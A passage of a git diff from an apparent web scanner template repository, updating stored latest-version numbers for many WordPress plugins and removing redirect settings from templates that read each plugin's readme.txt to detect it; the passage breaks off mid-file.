deletions(-) diff --git a/helpers/wordpress/plugins/ad-inserter.txt b/helpers/wordpress/plugins/ad-inserter.txt index af14db8ef5..ab20351dec 100644 --- a/helpers/wordpress/plugins/ad-inserter.txt +++ b/helpers/wordpress/plugins/ad-inserter.txt @@ -1 +1 @@ -2.7.22 \ No newline at end of file +2.7.23 \ No newline at end of file diff --git a/helpers/wordpress/plugins/all-404-redirect-to-homepage.txt b/helpers/wordpress/plugins/all-404-redirect-to-homepage.txt index 98fccd6d02..8a36cd142b 100644 --- a/helpers/wordpress/plugins/all-404-redirect-to-homepage.txt +++ b/helpers/wordpress/plugins/all-404-redirect-to-homepage.txt @@ -1 +1 @@ -3.8 \ No newline at end of file +4.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/all-in-one-wp-migration.txt b/helpers/wordpress/plugins/all-in-one-wp-migration.txt index 7045c5d9ec..2d02cbd2f2 100644 --- a/helpers/wordpress/plugins/all-in-one-wp-migration.txt +++ b/helpers/wordpress/plugins/all-in-one-wp-migration.txt @@ -1 +1 @@ -7.68 \ No newline at end of file +7.69 \ No newline at end of file diff --git a/helpers/wordpress/plugins/astra-sites.txt b/helpers/wordpress/plugins/astra-sites.txt index 7eea2b0feb..e72ec4fec6 100644 --- a/helpers/wordpress/plugins/astra-sites.txt +++ b/helpers/wordpress/plugins/astra-sites.txt @@ -1 +1 @@ -3.1.20 \ No newline at end of file +3.1.21 \ No newline at end of file diff --git a/helpers/wordpress/plugins/coblocks.txt b/helpers/wordpress/plugins/coblocks.txt index fc5c55d0a0..9a0ae146b6 100644 --- a/helpers/wordpress/plugins/coblocks.txt +++ b/helpers/wordpress/plugins/coblocks.txt @@ -1 +1 @@ -2.25.4 \ No newline at end of file +2.25.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/complianz-gdpr.txt b/helpers/wordpress/plugins/complianz-gdpr.txt index efb9c6b832..4d1119ec4b 100644 --- a/helpers/wordpress/plugins/complianz-gdpr.txt +++ b/helpers/wordpress/plugins/complianz-gdpr.txt @@ -1 +1 @@ -6.3.6.1 \ No newline at end of file +6.3.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/contact-form-7.txt b/helpers/wordpress/plugins/contact-form-7.txt index 262122f679..722fb619ce 100644 --- a/helpers/wordpress/plugins/contact-form-7.txt +++ b/helpers/wordpress/plugins/contact-form-7.txt @@ -1 +1 @@ -5.7.1 \ No newline at end of file +5.7.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/custom-post-type-ui.txt b/helpers/wordpress/plugins/custom-post-type-ui.txt index d9ee6574b2..11d0d979d7 100644 --- a/helpers/wordpress/plugins/custom-post-type-ui.txt +++ b/helpers/wordpress/plugins/custom-post-type-ui.txt @@ -1 +1 @@ -1.13.3 \ No newline at end of file +1.13.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/duplicate-page.txt b/helpers/wordpress/plugins/duplicate-page.txt index e49188cba0..958d30d86d 100644 --- a/helpers/wordpress/plugins/duplicate-page.txt +++ b/helpers/wordpress/plugins/duplicate-page.txt @@ -1 +1 @@ -4.4.9 \ No newline at end of file +4.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/easy-wp-smtp.txt b/helpers/wordpress/plugins/easy-wp-smtp.txt index a73b432544..1d5e9e0bad 100644 --- a/helpers/wordpress/plugins/easy-wp-smtp.txt +++ b/helpers/wordpress/plugins/easy-wp-smtp.txt @@ -1 +1 @@ -1.5.2 \ No newline at end of file +1.5.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/elementor.txt b/helpers/wordpress/plugins/elementor.txt index 33f465d1ad..4764627f92 100644 --- a/helpers/wordpress/plugins/elementor.txt +++ b/helpers/wordpress/plugins/elementor.txt @@ -1 +1 @@ -3.9.1 \ No newline at end of file +3.9.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt index d41f08f1f3..9af9a6a81c 100644 --- a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt +++ b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt @@ -1 +1 @@ -5.5.1 \ No newline at end of file +5.5.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/font-awesome.txt b/helpers/wordpress/plugins/font-awesome.txt index ecedc98d1d..7e961f9e14 100644 --- a/helpers/wordpress/plugins/font-awesome.txt +++ b/helpers/wordpress/plugins/font-awesome.txt @@ -1 +1 @@ -4.3.1 \ No newline at end of file +4.3.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/forminator.txt b/helpers/wordpress/plugins/forminator.txt index e4264e9848..24b38a9596 100644 --- a/helpers/wordpress/plugins/forminator.txt +++ b/helpers/wordpress/plugins/forminator.txt @@ -1 +1 @@ -1.21.0 \ No newline at end of file +1.22.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-listings-and-ads.txt b/helpers/wordpress/plugins/google-listings-and-ads.txt index 45674f16a8..3b26524868 100644 --- a/helpers/wordpress/plugins/google-listings-and-ads.txt +++ b/helpers/wordpress/plugins/google-listings-and-ads.txt @@ -1 +1 @@ -2.3.3 \ No newline at end of file +2.3.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-site-kit.txt b/helpers/wordpress/plugins/google-site-kit.txt index a0f550d635..e85d689182 100644 --- a/helpers/wordpress/plugins/google-site-kit.txt +++ b/helpers/wordpress/plugins/google-site-kit.txt @@ -1 +1 @@ -1.89.0 \ No newline at end of file +1.90.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt index 1f4bff5c62..86417cf417 100644 --- a/helpers/wordpress/plugins/gutenberg.txt +++ b/helpers/wordpress/plugins/gutenberg.txt @@ -1 +1 @@ -14.7.3 \ No newline at end of file +14.8.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/leadin.txt b/helpers/wordpress/plugins/leadin.txt index 7acf60a455..334cc2afe3 100644 --- a/helpers/wordpress/plugins/leadin.txt +++ b/helpers/wordpress/plugins/leadin.txt @@ -1 +1 @@ -9.2.12 \ No newline at end of file +9.2.81 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailpoet.txt b/helpers/wordpress/plugins/mailpoet.txt index ef8d7569d6..8191138914 100644 --- a/helpers/wordpress/plugins/mailpoet.txt +++ b/helpers/wordpress/plugins/mailpoet.txt @@ -1 +1 @@ -4.2.0 \ No newline at end of file +4.3.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/meta-box.txt b/helpers/wordpress/plugins/meta-box.txt index db4dd40c58..1c3c447660 100644 --- a/helpers/wordpress/plugins/meta-box.txt +++ b/helpers/wordpress/plugins/meta-box.txt @@ -1 +1 @@ -5.6.14 \ No newline at end of file +5.6.15 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ml-slider.txt b/helpers/wordpress/plugins/ml-slider.txt index 0f414fd3e1..6d99b7aae6 100644 --- a/helpers/wordpress/plugins/ml-slider.txt +++ b/helpers/wordpress/plugins/ml-slider.txt @@ -1 +1 @@ -3.28.0 \ No newline at end of file +3.28.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/photo-gallery.txt b/helpers/wordpress/plugins/photo-gallery.txt index ff2fd4fbef..8b315b3fed 100644 --- a/helpers/wordpress/plugins/photo-gallery.txt +++ b/helpers/wordpress/plugins/photo-gallery.txt @@ -1 +1 @@ -1.8.5 \ No newline at end of file +1.8.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/post-smtp.txt b/helpers/wordpress/plugins/post-smtp.txt index fae692e41d..6b4d157738 100644 --- a/helpers/wordpress/plugins/post-smtp.txt +++ b/helpers/wordpress/plugins/post-smtp.txt @@ -1 +1 @@ -2.2.1 \ No newline at end of file +2.2.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt index bd17ab05f9..d704a500a9 100644 --- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt +++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt @@ -1 +1 @@ -4.9.44 \ No newline at end of file +4.9.45 \ No newline at end of file diff --git a/helpers/wordpress/plugins/really-simple-ssl.txt b/helpers/wordpress/plugins/really-simple-ssl.txt index d089f6d748..17e1a55c78 100644 --- a/helpers/wordpress/plugins/really-simple-ssl.txt +++ b/helpers/wordpress/plugins/really-simple-ssl.txt @@ -1 +1 @@ -6.0.12 \ No newline at end of file +6.0.14 \ No newline at end of file diff --git a/helpers/wordpress/plugins/seo-by-rank-math.txt b/helpers/wordpress/plugins/seo-by-rank-math.txt index e148b09508..f7528e3ff9 100644 --- a/helpers/wordpress/plugins/seo-by-rank-math.txt +++ b/helpers/wordpress/plugins/seo-by-rank-math.txt @@ -1 +1 @@ -1.0.103.1 \ No newline at end of file +1.0.105 \ No newline at end of file diff --git a/helpers/wordpress/plugins/so-widgets-bundle.txt b/helpers/wordpress/plugins/so-widgets-bundle.txt index b8beb39172..241e887d6f 100644 --- a/helpers/wordpress/plugins/so-widgets-bundle.txt +++ b/helpers/wordpress/plugins/so-widgets-bundle.txt @@ -1 +1 @@ -1.45.0 \ No newline at end of file +1.46.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/tablepress.txt b/helpers/wordpress/plugins/tablepress.txt index ba885f1bb4..10bf840ed5 100644 --- a/helpers/wordpress/plugins/tablepress.txt +++ b/helpers/wordpress/plugins/tablepress.txt @@ -1 +1 @@ -1.14 \ No newline at end of file +2.0.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/translatepress-multilingual.txt b/helpers/wordpress/plugins/translatepress-multilingual.txt index 6550da6970..ab6d27898c 100644 --- a/helpers/wordpress/plugins/translatepress-multilingual.txt +++ b/helpers/wordpress/plugins/translatepress-multilingual.txt @@ -1 +1 @@ -2.4.3 \ No newline at end of file +2.4.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt index 7c32728738..e3a4f19336 100644 --- a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt +++ b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt @@ -1 +1 @@ -2.1.1 \ No newline at end of file +2.2.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/webp-converter-for-media.txt b/helpers/wordpress/plugins/webp-converter-for-media.txt index d41f08f1f3..566ac6388b 100644 --- a/helpers/wordpress/plugins/webp-converter-for-media.txt +++ b/helpers/wordpress/plugins/webp-converter-for-media.txt @@ -1 +1 @@ -5.5.1 \ No newline at end of file +5.6.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt index 1b47e8f3ef..7cbea073be 100644 --- a/helpers/wordpress/plugins/woocommerce-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-payments.txt @@ -1 +1 @@ -5.1.2 \ No newline at end of file +5.2.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce.txt b/helpers/wordpress/plugins/woocommerce.txt index 4b49d9bb63..e1ce7b82a2 100644 --- a/helpers/wordpress/plugins/woocommerce.txt +++ b/helpers/wordpress/plugins/woocommerce.txt @@ -1 +1 @@ -7.2.0 \ No newline at end of file +7.2.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wordpress-seo.txt b/helpers/wordpress/plugins/wordpress-seo.txt index 7350bc1da0..a4bcb5031b 100644 --- a/helpers/wordpress/plugins/wordpress-seo.txt +++ b/helpers/wordpress/plugins/wordpress-seo.txt @@ -1 +1 @@ -19.12 \ No newline at end of file +19.13 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt index fccfd7572b..7b8ae8d79c 100644 --- a/helpers/wordpress/plugins/wp-statistics.txt +++ b/helpers/wordpress/plugins/wp-statistics.txt @@ -1 +1 @@ -13.2.8 \ No newline at end of file +13.2.10 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-user-avatar.txt b/helpers/wordpress/plugins/wp-user-avatar.txt index 4f3470c166..99523d4768 100644 --- a/helpers/wordpress/plugins/wp-user-avatar.txt +++ b/helpers/wordpress/plugins/wp-user-avatar.txt @@ -1 +1 @@ -4.4.1 \ No newline at end of file +4.5.1 \ No newline at end of file diff --git a/technologies/wordpress/plugins/ad-inserter.yaml b/technologies/wordpress/plugins/ad-inserter.yaml index 761e645af8..3bf7c58f1e 100644 --- a/technologies/wordpress/plugins/ad-inserter.yaml +++ b/technologies/wordpress/plugins/ad-inserter.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/ad-inserter/readme.txt" diff --git a/technologies/wordpress/plugins/add-to-any.yaml b/technologies/wordpress/plugins/add-to-any.yaml index c7d4ddd798..3f7e95e908 100644 --- a/technologies/wordpress/plugins/add-to-any.yaml +++ b/technologies/wordpress/plugins/add-to-any.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/add-to-any/readme.txt" diff --git a/technologies/wordpress/plugins/admin-menu-editor.yaml b/technologies/wordpress/plugins/admin-menu-editor.yaml index 49de6bb341..82b2b3bc61 100644 --- a/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/admin-menu-editor/readme.txt" diff --git a/technologies/wordpress/plugins/adminimize.yaml b/technologies/wordpress/plugins/adminimize.yaml index 39d1e29582..890c30748d 100644 --- a/technologies/wordpress/plugins/adminimize.yaml +++ b/technologies/wordpress/plugins/adminimize.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/adminimize/readme.txt" diff --git a/technologies/wordpress/plugins/advanced-custom-fields.yaml b/technologies/wordpress/plugins/advanced-custom-fields.yaml index fe729ad25f..190a851bbc 100644 --- a/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/advanced-custom-fields/readme.txt" diff --git a/technologies/wordpress/plugins/akismet.yaml b/technologies/wordpress/plugins/akismet.yaml index 381d1d72c0..834d3be60a 100644 --- a/technologies/wordpress/plugins/akismet.yaml +++ b/technologies/wordpress/plugins/akismet.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/akismet/readme.txt" diff --git a/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index e44e73c39e..47b14549c1 100644 --- a/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/all-404-redirect-to-homepage/readme.txt" diff --git a/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 52aa5d23a3..141b18afbd 100644 --- a/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/all-in-one-seo-pack/readme.txt" diff --git a/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 120a1f8da3..70137d7ce6 100644 --- a/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt" diff --git a/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 02be08ba6c..1789c98b1f 100644 --- a/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-security-and-firewall/readme.txt" diff --git a/technologies/wordpress/plugins/amp.yaml b/technologies/wordpress/plugins/amp.yaml index 45d7d4fbac..058f93549a 100644 --- a/technologies/wordpress/plugins/amp.yaml +++ b/technologies/wordpress/plugins/amp.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/amp/readme.txt" diff --git a/technologies/wordpress/plugins/antispam-bee.yaml b/technologies/wordpress/plugins/antispam-bee.yaml index ceb0510597..9926b74ac4 100644 --- a/technologies/wordpress/plugins/antispam-bee.yaml +++ b/technologies/wordpress/plugins/antispam-bee.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/antispam-bee/readme.txt" diff --git a/technologies/wordpress/plugins/astra-sites.yaml b/technologies/wordpress/plugins/astra-sites.yaml index 1b7522de7b..cc711b197f 100644 --- a/technologies/wordpress/plugins/astra-sites.yaml +++ b/technologies/wordpress/plugins/astra-sites.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/astra-sites/readme.txt" diff --git a/technologies/wordpress/plugins/astra-widgets.yaml b/technologies/wordpress/plugins/astra-widgets.yaml index 94de2b1d9e..f8cd0a8b15 100644 --- a/technologies/wordpress/plugins/astra-widgets.yaml +++ b/technologies/wordpress/plugins/astra-widgets.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/astra-widgets/readme.txt" diff --git a/technologies/wordpress/plugins/autoptimize.yaml b/technologies/wordpress/plugins/autoptimize.yaml index 5145e3382e..d7831e6f61 100644 --- a/technologies/wordpress/plugins/autoptimize.yaml +++ b/technologies/wordpress/plugins/autoptimize.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/autoptimize/readme.txt" diff --git a/technologies/wordpress/plugins/backwpup.yaml b/technologies/wordpress/plugins/backwpup.yaml index e7f585c9f9..0eccfca3bd 100644 --- a/technologies/wordpress/plugins/backwpup.yaml +++ b/technologies/wordpress/plugins/backwpup.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/backwpup/readme.txt" diff --git a/technologies/wordpress/plugins/better-search-replace.yaml b/technologies/wordpress/plugins/better-search-replace.yaml index 9bf4e2e827..1e3d0d94c4 100644 --- a/technologies/wordpress/plugins/better-search-replace.yaml +++ b/technologies/wordpress/plugins/better-search-replace.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/better-search-replace/readme.txt" diff --git a/technologies/wordpress/plugins/better-wp-security.yaml b/technologies/wordpress/plugins/better-wp-security.yaml index 36b945705b..560793d240 100644 --- a/technologies/wordpress/plugins/better-wp-security.yaml +++ b/technologies/wordpress/plugins/better-wp-security.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/better-wp-security/readme.txt" diff --git a/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index ca1f5b4b0a..0f163da4d4 100644 --- a/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/black-studio-tinymce-widget/readme.txt" diff --git a/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/technologies/wordpress/plugins/breadcrumb-navxt.yaml index eba748064c..c0cb9255dd 100644 --- a/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/breadcrumb-navxt/readme.txt" diff --git a/technologies/wordpress/plugins/broken-link-checker.yaml b/technologies/wordpress/plugins/broken-link-checker.yaml index ca02f508a1..0ac9701970 100644 --- a/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/technologies/wordpress/plugins/broken-link-checker.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/broken-link-checker/readme.txt" diff --git a/technologies/wordpress/plugins/child-theme-configurator.yaml b/technologies/wordpress/plugins/child-theme-configurator.yaml index 23410b491b..e6113429ab 100644 --- a/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/child-theme-configurator/readme.txt" diff --git a/technologies/wordpress/plugins/classic-editor.yaml b/technologies/wordpress/plugins/classic-editor.yaml index f0f92e04ff..cd596233b6 100644 --- a/technologies/wordpress/plugins/classic-editor.yaml +++ b/technologies/wordpress/plugins/classic-editor.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/classic-editor/readme.txt" diff --git a/technologies/wordpress/plugins/classic-widgets.yaml b/technologies/wordpress/plugins/classic-widgets.yaml index 2552023912..89bf85a4bc 100644 --- a/technologies/wordpress/plugins/classic-widgets.yaml +++ b/technologies/wordpress/plugins/classic-widgets.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/classic-widgets/readme.txt" diff --git a/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 25584dcd1c..64990fca6e 100644 --- a/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/click-to-chat-for-whatsapp/readme.txt" diff --git a/technologies/wordpress/plugins/cloudflare.yaml b/technologies/wordpress/plugins/cloudflare.yaml index 2cc06c976f..c1f926dadd 100644 --- a/technologies/wordpress/plugins/cloudflare.yaml +++ b/technologies/wordpress/plugins/cloudflare.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/cloudflare/readme.txt" diff --git a/technologies/wordpress/plugins/cmb2.yaml b/technologies/wordpress/plugins/cmb2.yaml index 68b6651033..f2454691c5 100644 --- a/technologies/wordpress/plugins/cmb2.yaml +++ b/technologies/wordpress/plugins/cmb2.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/cmb2/readme.txt" diff --git a/technologies/wordpress/plugins/coblocks.yaml b/technologies/wordpress/plugins/coblocks.yaml index 74bf3dfc35..b9b791583a 100644 --- a/technologies/wordpress/plugins/coblocks.yaml +++ b/technologies/wordpress/plugins/coblocks.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/coblocks/readme.txt" diff --git a/technologies/wordpress/plugins/code-snippets.yaml b/technologies/wordpress/plugins/code-snippets.yaml index 661a9d0775..ee12fa749a 100644 --- a/technologies/wordpress/plugins/code-snippets.yaml +++ b/technologies/wordpress/plugins/code-snippets.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/code-snippets/readme.txt" diff --git a/technologies/wordpress/plugins/coming-soon.yaml b/technologies/wordpress/plugins/coming-soon.yaml index a55bf34a3c..ecb26f5e75 100644 --- a/technologies/wordpress/plugins/coming-soon.yaml +++ b/technologies/wordpress/plugins/coming-soon.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/coming-soon/readme.txt" diff --git a/technologies/wordpress/plugins/complianz-gdpr.yaml b/technologies/wordpress/plugins/complianz-gdpr.yaml index 32a4256a91..05efa3ddbc 100644 --- a/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/complianz-gdpr/readme.txt" diff --git a/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 0457fd9707..d44778134a 100644 --- a/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/contact-form-7-honeypot/readme.txt" diff --git a/technologies/wordpress/plugins/contact-form-7.yaml b/technologies/wordpress/plugins/contact-form-7.yaml index a81f2cb7fd..d791c57ac6 100644 --- a/technologies/wordpress/plugins/contact-form-7.yaml +++ b/technologies/wordpress/plugins/contact-form-7.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt" diff --git a/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 28a68c3f19..0993ef79be 100644 --- a/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/contact-form-cfdb7/readme.txt" diff --git a/technologies/wordpress/plugins/cookie-law-info.yaml b/technologies/wordpress/plugins/cookie-law-info.yaml index beb14b77d7..21a5192f45 100644 --- a/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/technologies/wordpress/plugins/cookie-law-info.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/cookie-law-info/readme.txt" diff --git a/technologies/wordpress/plugins/cookie-notice.yaml b/technologies/wordpress/plugins/cookie-notice.yaml index 1fd7be3abf..1e65caeb1f 100644 --- a/technologies/wordpress/plugins/cookie-notice.yaml +++ b/technologies/wordpress/plugins/cookie-notice.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/cookie-notice/readme.txt" diff --git a/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 052f58b19b..aa0cd7880c 100644 --- a/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/creame-whatsapp-me/readme.txt" diff --git a/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index f7d49ec9fd..33c8060f9d 100644 --- a/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/creative-mail-by-constant-contact/readme.txt" diff --git a/technologies/wordpress/plugins/custom-css-js.yaml b/technologies/wordpress/plugins/custom-css-js.yaml index 853138b934..da550064f4 100644 --- a/technologies/wordpress/plugins/custom-css-js.yaml +++ b/technologies/wordpress/plugins/custom-css-js.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/custom-css-js/readme.txt" diff --git a/technologies/wordpress/plugins/custom-fonts.yaml b/technologies/wordpress/plugins/custom-fonts.yaml index 344de449d1..25c349cdca 100644 --- a/technologies/wordpress/plugins/custom-fonts.yaml +++ b/technologies/wordpress/plugins/custom-fonts.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/custom-fonts/readme.txt" diff --git a/technologies/wordpress/plugins/custom-post-type-ui.yaml b/technologies/wordpress/plugins/custom-post-type-ui.yaml index a6de362f6c..8c5334cca3 100644 --- a/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -13,8 